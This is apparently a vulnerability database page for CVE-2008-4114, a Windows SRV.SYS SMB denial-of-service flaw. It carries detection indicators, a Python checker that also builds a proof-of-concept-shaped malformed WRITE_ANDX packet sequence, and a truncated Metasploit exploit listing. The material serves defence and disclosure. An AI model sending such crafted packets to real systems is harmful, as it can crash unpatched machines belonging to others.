CVE-2008-4114
Published 2008-09-16
Priority: P3 · 47
CVSS 2.0 base score: 7.1 (High), vector AV:N/AC:M/Au:N/C:N/I:N/A:C
Exploit: public (see the Exploit-DB and Metasploit entries below)
EPSS: 49.28% (98.7th percentile)
srv.sys in the Server service in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2, Vista Gold and SP1, and Server 2008 allows remote attackers to cause a denial of service (system crash) or possibly have unspecified other impact via an SMB WRITE_ANDX packet with an offset that is inconsistent with the packet size, related to "insufficiently validating the buffer size," as demonstrated by a request to the \PIPE\lsarpc named pipe, aka "SMB Validation Denial of Service Vulnerability." The fix shipped in Microsoft Security Bulletin MS09-001 (linked in the references below).
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| microsoft | windows_vista | — | — |
| microsoft | windows_vista | — | — |
Detection & IOCs (extracted from sources)
- The vulnerability-level indicator, independent of any particular PoC, is a WRITE_ANDX request whose DataOffset and DataLength do not fit inside the SMB message length (the "offset inconsistent with the packet size" in the description).
- Monitor for SMB NT_CREATE_ANDX requests targeting the named pipe \PIPE\lsarpc immediately followed by a malformed WRITE_ANDX packet; this is the exact exploit sequence demonstrated in the PoC.
- Flag SMB packets whose 8-byte security signature field reads 0xcccccccc 0xcccccccc (Signature1/Signature2 in the Metasploit packet struct) in the WRITE_ANDX request header; this is a PoC-specific artifact set by the exploit, not a property of the vulnerability.
- Look for SMB WRITE_ANDX packets with AndXOffset set to 0xdede; this non-standard chained-command offset value is used in the exploit's crafted packets.
- Alert on system crashes (bugchecks) attributed to the SRV.SYS kernel driver following inbound SMB traffic on TCP ports 445/139, since successful exploitation results in a system crash (BSOD).
- Caveat: the Metasploit PoC hardcodes SMB credentials (SMBUser/SMBPass = 'testuser') and domain/host ('COBAYA'); these are test-environment values and will not match real-world attacker configurations, so do not rely on credential matching for detection.
- Caveat: the Metasploit auxiliary module (ms09_001_write.rb) was tested successfully only against Windows Vista; behaviour and detectability may differ on other affected OS versions.
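The inconsistency the description names (a WRITE_ANDX DataOffset that does not fit the packet) and the PoC artifacts listed above can both be checked mechanically. The following Python is an added example written for this page; it is not code from the CVE page, Microsoft, or the Metasploit module. It parses SMB1 requests using the MS-CIFS field layout (32-byte header, WordCount, Words, ByteCount, Bytes), flags the structural inconsistency that srv.sys failed to validate, flags the PoC-specific signature and AndXOffset values, and runs a stateful check for an NT_CREATE_ANDX on an lsarpc pipe followed by a malformed WRITE_ANDX. The sample packets, FIDs, header flag values and finding names are constructed for the example.

```python
"""SMB1 WRITE_ANDX consistency checks in the spirit of CVE-2008-4114. Added example,
not code from the CVE page, Microsoft or Metasploit; packets below are constructed."""
import struct

SMB_MAGIC = b"\xffSMB"
SMB_COM_WRITE_ANDX, SMB_COM_NT_CREATE_ANDX = 0x2F, 0xA2
SMB_HDR_LEN, NO_ANDX_COMMAND = 32, 0xFF


def parse_smb1(msg: bytes) -> dict:
    """Split one SMB1 message (NetBIOS session header already removed) into its parts."""
    if len(msg) < SMB_HDR_LEN + 3 or msg[:4] != SMB_MAGIC:
        raise ValueError("not an SMB1 message")
    word_count = msg[SMB_HDR_LEN]
    words_end = SMB_HDR_LEN + 1 + 2 * word_count
    if len(msg) < words_end + 2:
        raise ValueError("truncated parameter block")
    return {"command": msg[4],
            "signature": msg[14:22],       # SecurityFeatures; Signature1/Signature2 in Metasploit's struct
            "word_count": word_count,
            "words": msg[SMB_HDR_LEN + 1:words_end],
            "byte_count": struct.unpack_from("<H", msg, words_end)[0],
            "bytes_start": words_end + 2,  # first byte after ByteCount
            "length": len(msg)}


def check_write_andx(msg: bytes) -> list:
    """Findings a validating server (or an IDS) should raise for one WRITE_ANDX request."""
    p = parse_smb1(msg)
    if p["command"] != SMB_COM_WRITE_ANDX:
        return []
    if p["word_count"] not in (12, 14):
        return ["bad_word_count"]
    # Words: AndXCommand(1) AndXReserved(1) AndXOffset(2) FID(2) Offset(4) Timeout(4)
    #        WriteMode(2) Remaining(2) Reserved(2) DataLength(2) DataOffset(2) [OffsetHigh(4)]
    andx_cmd, _, andx_off, _fid, _off, _tmo, _mode, _rem, _, data_len, data_off = \
        struct.unpack_from("<BBHHIIHHHHH", p["words"], 0)
    findings = []
    # CVE-2008-4114 condition: DataOffset counts from the SMB header start, must land after
    # the parameter block, and DataOffset + DataLength must stay inside the message.
    if data_off < p["bytes_start"] or data_off + data_len > p["length"]:
        findings.append("dataoffset_inconsistent")
    if andx_cmd == NO_ANDX_COMMAND and andx_off != 0:   # no chained command: AndXOffset should be 0
        findings.append("andxoffset_without_chain")
    # PoC-specific artifacts from the IOC list: cheap to match, trivial for an attacker to change.
    if andx_off == 0xDEDE:
        findings.append("poc_andxoffset_dede")
    if p["signature"] == b"\xcc" * 8:
        findings.append("poc_signature_cccccccc")
    return findings


def scan_session(messages: list) -> list:
    """Stateful pass over one client's requests: NT_CREATE_ANDX on an lsarpc pipe followed
    by an inconsistent WRITE_ANDX is the sequence the PoC sends."""
    alerts, saw_lsarpc_create = [], False
    for i, msg in enumerate(messages):
        p = parse_smb1(msg)
        if p["command"] == SMB_COM_NT_CREATE_ANDX:
            name = msg[p["bytes_start"]:p["bytes_start"] + p["byte_count"]]
            # Strip NULs so ASCII and UTF-16LE pipe names compare the same way.
            saw_lsarpc_create = b"lsarpc" in name.replace(b"\x00", b"").lower()
        elif p["command"] == SMB_COM_WRITE_ANDX:
            f = check_write_andx(msg)
            if "dataoffset_inconsistent" in f and saw_lsarpc_create:
                alerts.append((i, "lsarpc_create_then_malformed_write_andx", f))
            elif f:
                alerts.append((i, "malformed_write_andx", f))
    return alerts


# --- constructed test packets (not captured traffic); header field values are arbitrary ---
def smb_header(command: int, signature: bytes = b"\x00" * 8) -> bytes:
    return (SMB_MAGIC + struct.pack("<BIBHH", command, 0, 0x18, 0x0001, 0)
            + signature + struct.pack("<HHHHH", 0, 0x0800, 0xFEFF, 0x0800, 0x0001))


def build_nt_create_andx(name: bytes) -> bytes:
    """NT_CREATE_ANDX (WordCount 24) opening ASCII `name` relative to the IPC$ tree."""
    name_z = name + b"\x00"
    words = struct.pack("<BBHBHIIIQIIIIIB", NO_ANDX_COMMAND, 0, 0, 0, len(name_z),
                        0, 0, 0x0002019F, 0, 0, 3, 1, 0, 2, 0)
    return (smb_header(SMB_COM_NT_CREATE_ANDX) + bytes([24]) + words
            + struct.pack("<H", len(name_z)) + name_z)


def build_write_andx(fid: int, data: bytes, data_offset=None,
                     andx_offset: int = 0, signature: bytes = b"\x00" * 8) -> bytes:
    """WRITE_ANDX (WordCount 14); data_offset=None yields the consistent value."""
    if data_offset is None:  # header + WordCount + 14 words + ByteCount + 1 pad byte
        data_offset = SMB_HDR_LEN + 1 + 28 + 2 + 1
    words = struct.pack("<BBHHIIHHHHHI", NO_ANDX_COMMAND, 0, andx_offset, fid, 0, 0xFFFFFFFF,
                        0x0008, 0, 0, len(data), data_offset, 0)
    return (smb_header(SMB_COM_WRITE_ANDX, signature) + bytes([14]) + words
            + struct.pack("<H", len(data) + 1) + b"\x00" + data)


BENIGN_WRITE = build_write_andx(0x4000, b"hello")
# PoC-shaped sequence: open \lsarpc, then a WRITE_ANDX whose DataOffset points far past the packet.
POC_SESSION = [build_nt_create_andx(b"\\lsarpc"),
               build_write_andx(0x4000, b"A" * 16, data_offset=0xFFFF,
                                andx_offset=0xDEDE, signature=b"\xcc" * 8)]
```

The structural check in check_write_andx is the one a patched server performs and the one a detection should lead with; the 0xdede and 0xcccccccc matches are kept separate so a rule author can weight them as weak, PoC-specific corroboration rather than as the primary signal.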
No detection rules found.
Exploit-DB
Microsoft Windows - 'WRITE_ANDX' SMB Command Handling Kernel Denial of Service (Metasploit)
exploitdb · 2008-09-15 · CVE-2008-4114
---
```ruby
require 'msf/core'

module Msf
module Exploits
module Test

class BugTest < Msf::Exploit::Remote
  include Exploit::Remote::SMB

  def initialize(info = {})
    super(update_info(info,
      'Name'        => 'test exploit',
      'Description' => "tests",
      'Author'      => 'tests',
      'License'     => MSF_LICENSE,
      'Version'     => '$Revision: 0 $',
      'Arch'        => 'x86',
      'Payload'     => { 'Space' => 1000 },
      'Targets'     =>
        [
          [ 'Windows VISTA', { 'Platform' => 'win' } ],
        ],
      'DefaultTarget' => 0))
  end

  # Parameters name the WRITE_ANDX fields the PoC controls: the DataLength low word,
  # the DataOffset, and the size of the filler placed in the packet.
  def subexploit(dlenlow, doffset, fillersize)
    print_line("1")
    datastore['SMBUser']   = 'testuser'
    datastore['SMBPass']   = 'testuser'
    datastore['SMBDomain'] = 'COBAYA'
    datastore['SMBName']   = 'COBAYA'
    print_line("2")
    connect()
    print_line("3")
    smb_login()
    print_line("4")
    pkt = CONST::SMB_CREATE_PKT.make_struct
    pkt['Payload']['SMB'].v['Flags1'] = 0x18
    pkt['Payload']['S
    # (listing is truncated at this point in the indexed Exploit-DB copy)
```
Metasploit
Microsoft SRV.SYS WriteAndX Invalid DataOffset
metasploit
This module exploits a denial of service vulnerability in the SRV.SYS driver of the Windows operating system. This module has been tested successfully against Windows Vista.
No writeups or analysis indexed.
CWE
CWE-20: Improper Input Validation
mitre_cwe
The product receives input or data, but it does not validate or incorrectly validates that the input has the properties that are required to process the data safely and correctly.
Input validation is a frequently-used technique for checking potentially dangerous inputs in order to ensure that the inputs are safe for processing within the code, or when communicating with other components. Input can consist of: raw data (strings, numbers, parameters, file contents, etc.) and metadata (information about the raw data, such as headers or size). Data can be simple or structured. Structured data can be composed of many nested layers, composed of combinations of metadata and raw data, with other simple or structured data. Many properties of raw data or metadata may n
CWE
CWE-1288: Improper Validation of Consistency within Input
mitre_cwe · CVSS 7.5 [HIGH]
The product receives a complex input with multiple elements or fields that must be consistent with each other, but it does not validate or incorrectly validates that the input is actually consistent.
Some input data can be structured with multiple elements or fields that must be consistent with each other, e.g. a number-of-items field that is followed by the expected number of elements. When such complex inputs are inconsistent, attackers could trigger unexpected errors, cause incorrect actions to take place, or exploit latent vulnerabilities.
Modes of Introduction: Implementation
Common Consequences: Scope: Other. Impact: Varies by Context.
Potential Mitigations: [Implementation] Assume all input is malicious. Use an "a
CWE
CWE-823: Use of Out-of-range Pointer Offset
mitre_cwe
The product performs pointer arithmetic on a valid pointer, but it uses an offset that can point outside of the intended range of valid memory locations for the resulting pointer.
While a pointer can contain a reference to any arbitrary memory location, a program typically only intends to use the pointer to access limited portions of memory, such as contiguous memory used to access an individual array. Programs may use offsets in order to access fields or sub-elements stored within structured data. The offset might be out-of-range if it comes from an untrusted source, is the result of an incorrect calculation, or occurs because of another error. If an attacker can control or influence the offset so that it points outside of the intended boundar
References
http://secunia.com/advisories/31883
http://www.reversemode.com/index.php?option=com_content&task=view&id=54&Itemid=1
http://www.securityfocus.com/archive/1/496354/100/0/threaded
http://www.securityfocus.com/bid/31179
http://www.securitytracker.com/id?1020887
http://www.us-cert.gov/cas/techalerts/TA09-013A.html
http://www.vallejo.cc/proyectos/vista_SMB_write_DoS.htm
http://www.vupen.com/english/advisories/2008/2583
https://docs.microsoft.com/en-us/security-updates/securitybulletins/2009/ms09-001
https://exchange.xforce.ibmcloud.com/vulnerabilities/45146
https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A5262
https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A6044
https://www.exploit-db.com/exploits/6463